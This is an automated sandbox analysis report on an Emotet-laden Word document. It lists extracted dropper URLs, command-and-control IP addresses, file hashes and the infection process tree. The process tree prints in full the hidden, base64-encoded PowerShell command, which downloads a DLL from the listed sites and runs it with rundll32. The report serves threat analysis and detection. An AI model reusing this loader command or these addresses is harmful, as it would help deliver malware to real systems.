Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    12-02-2021 09:08

General

  • Target

    d6ee2a32070f12da58fcf65aa7240cd773599ac2279f7d97ba00eed223e563a9.doc

  • Size

    166KB

  • MD5

    c5ebbb03013d2a82a70112f803574b8c

  • SHA1

    9ab54b4488e502aeb36c1c79d1ec867fc2316549

  • SHA256

    d6ee2a32070f12da58fcf65aa7240cd773599ac2279f7d97ba00eed223e563a9

  • SHA512

    fceea6e454285bb8e83a06e07420a822cef9fb153f1586ed401541beb18553660e4d9e0a7a010f36c21687c11a2f46682a26640663c3b3e30c3dc9ef377af6a8

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://dripsweet.com/wp-admin/gTiO/

exe.dropper

http://jbsmediaventures.com/wp-content/V/

exe.dropper

https://www.r3-tech.biz/wp-admin/VT/

exe.dropper

http://yaginc.com/images/tk/

exe.dropper

http://novo2.deussalveobrasil.com.br/tractor-parts-gh28c/9/

exe.dropper

http://trekkingfestival.com/demo/C/

exe.dropper

http://narmada.mykfn.com/app/DqKG1/

Extracted

Family

emotet

Botnet

Epoch2

C2

69.38.130.14:80

195.159.28.230:8080

162.241.204.233:8080

115.21.224.117:80

78.189.148.42:80

181.165.68.127:80

78.188.225.105:80

161.0.153.60:80

89.106.251.163:80

172.125.40.123:80

5.39.91.110:7080

110.145.11.73:80

190.251.200.206:80

144.217.7.207:7080

75.109.111.18:80

75.177.207.146:80

139.59.60.244:8080

70.183.211.3:80

95.213.236.64:8080

61.19.246.238:443

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d6ee2a32070f12da58fcf65aa7240cd773599ac2279f7d97ba00eed223e563a9.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1684
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:268
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:932
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1740
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll AnyString
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1952
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll",#1
              5⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1780
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cgdkqfoelclqa\kpyryvjskcli.huy",dGNQzcTfdSuTsWT
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:884
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cgdkqfoelclqa\kpyryvjskcli.huy",#1
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1064

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • \Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll
      MD5

      3d2fd352dcc7a8ac966acb97962b0a99

      SHA1

      3da986ade7db698139ca46ca96f7d1e0aa3318f4

      SHA256

      9b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83

      SHA512

      82f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211

    • memory/268-5-0x0000000000000000-mapping.dmp
    • memory/884-33-0x0000000000000000-mapping.dmp
    • memory/932-12-0x000000001ABF0000-0x000000001ABF2000-memory.dmp
      Filesize

      8KB

    • memory/932-14-0x0000000001F90000-0x0000000001F91000-memory.dmp
      Filesize

      4KB

    • memory/932-15-0x000000001C320000-0x000000001C321000-memory.dmp
      Filesize

      4KB

    • memory/932-16-0x000000001B8D0000-0x000000001B8D1000-memory.dmp
      Filesize

      4KB

    • memory/932-7-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp
      Filesize

      8KB

    • memory/932-13-0x000000001ABF4000-0x000000001ABF6000-memory.dmp
      Filesize

      8KB

    • memory/932-6-0x0000000000000000-mapping.dmp
    • memory/932-8-0x000007FEF5970000-0x000007FEF635C000-memory.dmp
      Filesize

      9.9MB

    • memory/932-11-0x0000000002520000-0x0000000002521000-memory.dmp
      Filesize

      4KB

